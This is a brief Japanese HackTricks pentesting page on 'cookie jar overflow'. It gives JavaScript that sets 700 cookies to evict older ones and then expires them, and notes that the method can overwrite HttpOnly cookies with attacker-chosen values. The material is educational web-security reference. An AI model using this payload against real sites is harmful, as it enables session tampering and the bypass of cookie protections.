1.2 KiB

{{#include ../../banners/hacktricks-training.md}}

ブラウザには、ページごとに保存できるクッキーの数の制限があります。したがって、何らかの理由でクッキーを消す必要がある場合、クッキージャーをオーバーフローさせることができます。そうすれば、最も古いクッキーが削除されます。

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
}

注意してください。異なるドメインを指すサードパーティのクッキーは上書きされません。

Caution

この攻撃は、HttpOnlyクッキーを上書きするためにも使用でき、削除してから希望の値でリセットすることができます

これをこのラボの投稿で確認してください

{{#include ../../banners/hacktricks-training.md}}